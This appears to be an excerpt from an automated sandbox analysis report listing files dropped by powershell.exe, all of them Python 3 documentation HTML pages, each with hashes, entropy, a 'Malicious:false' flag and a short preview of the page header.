                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (490), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):36804
                                                                                                                                                                                                              Entropy (8bit):4.864940624180153
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:FHqkldWgnKTM65E8e8T0OiJTs3Bjx+thNH82tjwnoTM276zqWTC:VqydxoMCEST0LJTs3j+VHpcGM2762/
                                                                                                                                                                                                              MD5:6FA89B38AA731726178F8A16DA0846E9
                                                                                                                                                                                                              SHA1:0CC8843D751B51FA23059AC4B4412E3B1015835F
                                                                                                                                                                                                              SHA-256:428613736C7FF90A9894654514DEBB6FA6FA0056F487E304BC14CDE2D2280A36
                                                                                                                                                                                                              SHA-512:B261356146ED4E135E418E46ACA354B57757EB823CAEDD2BFCD6AA8243228BFD7D1653DA46A619388EAD5544C104CB9A0E833A27E451D8041F1435387D2DB5C4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Development Tools" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/development.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter help you write software. For example, the pydoc module takes a module and generates documentation based on the module.s contents. The doctest and unittest modu..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter help you write soft
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (457), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):36422
                                                                                                                                                                                                              Entropy (8bit):4.928596578492286
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:iZs7sVGqy3KSn7MOVhz9C1wzlK48t8tm3ngoS2DFqr23a7KSa/MTh762/:iZAEGqy3KmMOVhE1wzRNm3nO2DFqr23S
                                                                                                                                                                                                              MD5:BF38BD187DDDAC92BB35C4E253D0F78A
                                                                                                                                                                                                              SHA1:B66356488BF65B087682B0F95B121C3102A3A039
                                                                                                                                                                                                              SHA-256:5D7BF0B3A561B231F6E188C931008691A5A1977D6FBDD9F4C94CA284639B9CE1
                                                                                                                                                                                                              SHA-512:9133A0E706A6A2A3C699C029A46BC6CB89406D6A35DA6815F78933F06446B790AF6A14D751D10CB328843F953594F7EE6636E25AEA69C9B63B63B47ED437C715
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python Development Mode" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/devmode.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The Python Development Mode introduces additional runtime checks that are too expensive to be enabled by default. It should not be more verbose than the default if the code is correct; new warnings..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The Python Development Mode introduces additional runtime
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1023), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):46935
                                                                                                                                                                                                              Entropy (8bit):4.833499885615865
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:LVbqyjB1M5t9uAxogDyAxogA7AxogRjUlyF6647zwWA/yVoa4b/yVoaeh/yMoacW:LVbqyLM5t9uAxogDyAxogA7AxogRjUl0
                                                                                                                                                                                                              MD5:130CE5C89444ECC3505B8CB22E2E578A
                                                                                                                                                                                                              SHA1:A54CB929F6AF9C5D2B07B3B602E1007B09E4A47A
                                                                                                                                                                                                              SHA-256:16253F1213CB7A1B7B1179A6FA2F3C230518E0DCD106B0FDD049E2303F098EBB
                                                                                                                                                                                                              SHA-512:3E97288664D14489AA6D227B6EB7BC917B6DE2DB104EA7DC31A940727A26FB4FF8CA8D13027F82F658F4C41A15DC27088912AEDC0F86E39221F47CC6B808CA3F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Tkinter Dialogs" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/dialog.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="tkinter.simpledialog . Standard Tkinter input dialogs: Source code: Lib/tkinter/simpledialog.py The tkinter.simpledialog module contains convenience classes and functions for creating simple modal ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="tkinter.simpledialog . Standard Tkinter input dialogs: Source
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1724), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):131443
                                                                                                                                                                                                              Entropy (8bit):4.804870928243839
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:AqyIMTRtu6mZRL1ruzolYcyz9yFTyFlyYnBTqylzylwyYEykw/ybzIBTqylzylwF:/J5K1h4k1PfgjZ+AVhA
                                                                                                                                                                                                              MD5:430DB54137DAF2D74B9FAC5F8151F433
                                                                                                                                                                                                              SHA1:30CE521DB9C3961CD648F7BA748E19881BE6DA48
                                                                                                                                                                                                              SHA-256:68A37D622214C214BDDB432916A2DE2134CF502D93085C42F0DA32A721179D5C
                                                                                                                                                                                                              SHA-512:98A3EAE326940383640CD86422C6D3C3C1A0271F0C77FF2143CA366F2FEF06F973489E51E03C4D2D0E098D369F3EF8E7BFD7C2CC548B742A183920CC248FBE3B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="difflib . Helpers for computing deltas" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/difflib.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/difflib.py This module provides classes and functions for comparing sequences. It can be used for example, for comparing files, and can produce information about file differences i..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/difflib.py This module
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1344), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):195555
                                                                                                                                                                                                              Entropy (8bit):4.916847005183366
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:BqynMNBQlgS27NQAOwayFSyF2yYNyYWKw2yYR5KBSuDdOaQOwlyF+3OyFwlyFeyc:OKV7zTVfBd7LIQbU1hgt73qiHf818IqA
                                                                                                                                                                                                              MD5:5BE875669A78C791BD01D84F1A8FDB94
                                                                                                                                                                                                              SHA1:54F43C5A31EE17933E068758D6293B44C4629ED7
                                                                                                                                                                                                              SHA-256:71B5F52CA22141D53BCC1421259B127A4750825F03EFC7B513855C5F9DA443C5
                                                                                                                                                                                                              SHA-512:1B2ACAB04E313A3797DEBAE15C9F611BBD669F786B9A9DA82667073F87E07D8CE65DAC5040058EEF1A62EBBBF84B1F565F9135312053588093EF36A77373CD48
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="dis . Disassembler for Python bytecode" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/dis.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/dis.py The dis module supports the analysis of CPython bytecode by disassembling it. The CPython bytecode which this module takes as an input is defined in the file Include/opcode...." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/dis.py The dis module suppo
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16565
                                                                                                                                                                                                              Entropy (8bit):4.851094308638212
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:UHqklBuPYntTMOhh/XuKYnRTM776zqWTC:YqyBuwZMOhlXudVM7762/
                                                                                                                                                                                                              MD5:F18D2779DEF9CF18A8A0866981725DF5
                                                                                                                                                                                                              SHA1:4F11932A711B8972517CAC6A72ABA7578B8080CD
                                                                                                                                                                                                              SHA-256:B7AD2FAAA1436549F982C10CBA44640C7093749585CC219E5AE7783EEE607A52
                                                                                                                                                                                                              SHA-512:3233C7EFACBF93A7A583E7CC267DFCF8DBF4580C3537DBD99354E8D00CCF71C05D68BF648AEF9B2D74D7CA893ECD4EAAB795E34A58FEFA7D1BD3EAA869D7AE0D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Software Packaging and Distribution" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/distribution.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These libraries help you with publishing and installing Python software. While these modules are designed to work in conjunction with the Python Package Index, they can also be used with a local in..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These libraries help you with publishing
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (478), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):210973
                                                                                                                                                                                                              Entropy (8bit):4.843154403281149
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:66x6moMzyq43Hj+qJZxa5ejCW87wWsRtA:sn+qJZxa5ejCWWOA
                                                                                                                                                                                                              MD5:12EFFBC7796B6C5AA20B2F1D5B5C7DBB
                                                                                                                                                                                                              SHA1:55755F0D25DB2D2105DAE0F30CFA1BA1C3A2B117
                                                                                                                                                                                                              SHA-256:222A52A2B05E5691CB0DD4BFD31C2A6A7E774DC7EE85D3F30B3FD5EE1E5623B5
                                                                                                                                                                                                              SHA-512:217999A0A068772CAB171BFB19CE4E9B0B31D89F3562E5CACB2942421173B0216EE050BF917C0EFFE3065C0BDBE58B3800A4472FFB87848664B3455C83707EFA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="doctest . Test interactive Python examples" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/doctest.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/doctest.py The doctest module searches for pieces of text that look like interactive Python sessions, and then executes those sessions to verify that they work exactly as shown. Th..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/doctest.py The doct
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1007), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35482
                                                                                                                                                                                                              Entropy (8bit):4.833080827503928
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:+qy096MePP9yhOae8Ui0xtTp1Vvf5twtk0te00n04fiVyFwyFxyFH0f2VLliiBDe:+qy5MePP9yhfDUJxtT3Nf5twtk0te00V
                                                                                                                                                                                                              MD5:A94DFA91C6DD88E1E15B9DC54CF1A9FE
                                                                                                                                                                                                              SHA1:5CB5DD3363088F21A66D7EF88D27423CBE59935B
                                                                                                                                                                                                              SHA-256:C2291E3A4B530D1D02A5DCA1CCB0BA7D663CAFDFBEA3B28896FD19D2AD4D12F0
                                                                                                                                                                                                              SHA-512:871C87241DB6917FEF8FA20F54C401B75A313488DF21BC78E9CFF4DD92EA49B8C91605452B1105009F2E1CEEFA4833543827A0A0947E9BD178C4BCD201BEA3D7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email.charset: Representing character sets" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.charset.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/email/charset.py This module is part of the legacy ( Compat32) email API. In the new API only the aliases table is used. The remaining text in this section is the original document..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/email/charset.p
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (833), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):103424
                                                                                                                                                                                                              Entropy (8bit):4.801375979099371
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:DqyWM/is8OyEm2yYJyLFyFtNq2yYFyF79Gom21i+ExzpyFlyY5wE/yFwiHenbl2x:Di3dAwE5mUDiA
                                                                                                                                                                                                              MD5:2357130794F39442433C54C4472F7521
                                                                                                                                                                                                              SHA1:9927D8B767ED05AE270340AEA032E8C92BCCDEE3
                                                                                                                                                                                                              SHA-256:16BCD74EE06476B4E4A57A147CF72B1DA499685B80C3B0B4288A8ED7E392885F
                                                                                                                                                                                                              SHA-512:C48F4BF3FD205251CA1591BA277F9EE79E607D53BED1C338347971FE48616D012E555BB52DD6BFA3D551B76E44682D811BD85A00ADDB54882C57E3AB13FD1B2C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email.message.Message: Representing an email message using the compat32 API" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.compat32-message.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The Message class is very similar to the EmailMessage class, without the methods added by that class, and with the default behavior of certain other methods being slightly different. We also docume..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description"
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1229), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40952
                                                                                                                                                                                                              Entropy (8bit):4.8147361962512125
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:BqyueiM05n7wXwHog8XiwHogNzV57Qx7qEsh1X4y3zxXl70S83ti8kYxXx2pp3tn:BqyKM0B7wXwHog8XiwHogVV57Qx7PshP
                                                                                                                                                                                                              MD5:8D3254A47D2FB44196AECB6986214BA1
                                                                                                                                                                                                              SHA1:7A14848CF3320175BDECE013C17F1933979E77A4
                                                                                                                                                                                                              SHA-256:DC8605FAABCB079246A2610C74FCC85864A9B35BC4DB611EBDA108AFA9BEE757
                                                                                                                                                                                                              SHA-512:1CA28AE7CCFDE8336D60636B98BFC091E83B2CF86C4CBE4D96A074B631DE80F2BE73B8DA9570A04FEA4483ADD4443D5F78640710FBC31DB6057888C87C30DC42
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email.contentmanager: Managing MIME Content" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.contentmanager.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/email/contentmanager.py Content Manager Instances: Currently the email package provides only one concrete content manager, raw_data_manager, although more may be added in the futur..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/email/c
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (445), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):22050
                                                                                                                                                                                                              Entropy (8bit):4.855304117019378
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:J+W+qHqkl/i4nQTMEblhUXwJ7XIFXSdgXwIvHMv4nmTMJ76zqWTC:pqy/xeMEDUXm7XIFX4gXlsAMMJ762/
                                                                                                                                                                                                              MD5:97BAC2235C4CEA7D8ADC63D904371256
                                                                                                                                                                                                              SHA1:6EC0715C5AE7409B3DA9CC763D19744AB8A399EA
                                                                                                                                                                                                              SHA-256:80DB932CF012C83BFCC4B6DBA0B08C379B5BF1EFE4B76E0E52A66EB3832500DF
                                                                                                                                                                                                              SHA-512:E048379F5F5A2165CDFFED2B8E3B97B21AD1FC7B0A7AD6AC4609CAE976362DC365FE2D3B148E6ED86BD23975EAAD4759AC478398FBAC2F2C5A39D8B1AC7A900F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email.encoders: Encoders" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.encoders.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/email/encoders.py This module is part of the legacy ( Compat32) email API. In the new API the functionality is provided by the cte parameter of the set_content() method. This modul..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/email/encoders.py This module is
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (425), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):28730
                                                                                                                                                                                                              Entropy (8bit):4.857822494120875
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:TqynN0MOPgNn85ZaPZUJb8wBw7ssCMD762/:TqyWMOPgNn85sPZUJHBw70MD762/
                                                                                                                                                                                                              MD5:71F03183F6C903DB34BB8E397598E288
                                                                                                                                                                                                              SHA1:582DD78BC137667C5BFFFF8CF70FCA865AD777BF
                                                                                                                                                                                                              SHA-256:C47A8257846AC749ACC30D7E70B8C7EFC9E57C92B102059393F43D33321973E4
                                                                                                                                                                                                              SHA-512:59EDD4531EEDE7307EBB890670318AE447455CED8571FB303AC8CDFEA2FE1F08E710BB663D79A26EC719F29D669BAE301F3EA41BA1A9A27C26CB6863687C1B75
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email.errors: Exception and Defect classes" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.errors.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/email/errors.py The following exception classes are defined in the email.errors module: Here is the list of the defects that the FeedParser can find while parsing messages. Note th..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/email/errors.py
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (557), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65034
                                                                                                                                                                                                              Entropy (8bit):4.683523713753954
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:vH1H3qyOM4hhwy4nfRYnAynwg6ORMy762/:vH1H8h8RVM0A
                                                                                                                                                                                                              MD5:669B6D700304B1239C4B847954C99ECF
                                                                                                                                                                                                              SHA1:7E4531C85ED7ED81C1DCF82E7C53609EAB1B6492
                                                                                                                                                                                                              SHA-256:0F02D946A081E05B54080455ADB7F884CD98A222E63A8069709DF34BF63D320F
                                                                                                                                                                                                              SHA-512:98FB129C97CB1DC34C1DFE589024371C5A2C1418C48C6A6181CDD21A40C82DC76F899FD2FA770600C3F889DEAAB2F4DD4B3DCC7C60BA519FBDB483BBF481A9C1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email: Examples" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.examples.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Here are a few examples of how to use the email package to read, write, and send simple email messages, as well as more complex MIME messages. First, let.s see how to create and send a simple text ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Here are a few examples of how to use the email package
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1368), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):53457
                                                                                                                                                                                                              Entropy (8bit):4.8159161101314085
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:DqyYM1bXI3yFJyFwFyFkxQNbXRyYtyFOqC5XuyI3yFJyFwFyFVVQNNXRyYtyFt/z:jigujA
                                                                                                                                                                                                              MD5:B33F38489C590B2C82D5051EA6E4AE9E
                                                                                                                                                                                                              SHA1:C47706479C9209CED2B80CC5764E0882B9A8FD60
                                                                                                                                                                                                              SHA-256:2FFA1A25193DE0BB6EFF5D130F143520014559BBE4C75CEDF02EE1A2D9E6B1D0
                                                                                                                                                                                                              SHA-512:0972885455B17D739D50D0AECB56ECB3291B103D647A443F03B4D2622AA8607FD96BBC97BDE2E015FA6FB3558F9BF559F2E12389EEC3C861C2366E4E62731361
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email.generator: Generating MIME documents" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.generator.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/email/generator.py One of the most common tasks is to generate the flat (serialized) version of the email message represented by a message object structure. You will need to do thi..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/email/generat
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1607), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):41438
                                                                                                                                                                                                              Entropy (8bit):4.847671511260223
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:HTpqyFzKMlJT7T/tI9Tg8+9uXyF/yFQyFqyFlyc4ym6Tp/1X/yF4ymAvNg07W1yF:Fqy4MlNiIuXyF/yFQyFqyFlyc4ymeX/6
                                                                                                                                                                                                              MD5:E5A3DA50164BB518E7147AD6C92A5676
                                                                                                                                                                                                              SHA1:1B50F2BEB872E137A0829972E517ADEFE7E811DD
                                                                                                                                                                                                              SHA-256:3FF3076A568090C61E8CDDB0D1170203ED109107C05D69B7894805B3CD55EFA7
                                                                                                                                                                                                              SHA-512:51B0827CF4438065658F217091F23C69D6C8A69C21263AF312D1C852B5583F21E087817069F1DF9BCA6129A03964796B17AEFD0720F07E4F168289113180FE33
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email.header: Internationalized headers" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.header.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/email/header.py This module is part of the legacy ( Compat32) email API. In the current API encoding and decoding of headers is handled transparently by the dictionary-like API of ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/email/header.py Thi
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1196), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):71780
                                                                                                                                                                                                              Entropy (8bit):4.818257032970552
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:1qy3M8E3bOBCRZNF2mVJuVal12skG63qAJ8+YdWC9ZzizGKzKBjBONogqpNmyzJO:ZE+gLVmzkGCA
                                                                                                                                                                                                              MD5:90554E5231D1D122F4D759FF196C0E74
                                                                                                                                                                                                              SHA1:A73948DD262B41F4C75EC8A0670270104537846E
                                                                                                                                                                                                              SHA-256:7DCC45BDE7D0B11DCE287E6EA26BB41EA049BA3C60BEA3A1724522BFC4A01205
                                                                                                                                                                                                              SHA-512:F33A1A5D0F450523EFFB0113B2CB6C7E8233B833316AE0A36EE7F86BEB225B975A9FFE4E41F03F30DED94F7FA693CDCD36AECCCDE6361133C9370128B9EEC547
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="email.headerregistry: Custom Header Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/email.headerregistry.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/email/headerregistry.py Headers are represented by customized subclasses of str. The particular class used to represent a given header is determined by the header_factory of the po..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/email/h
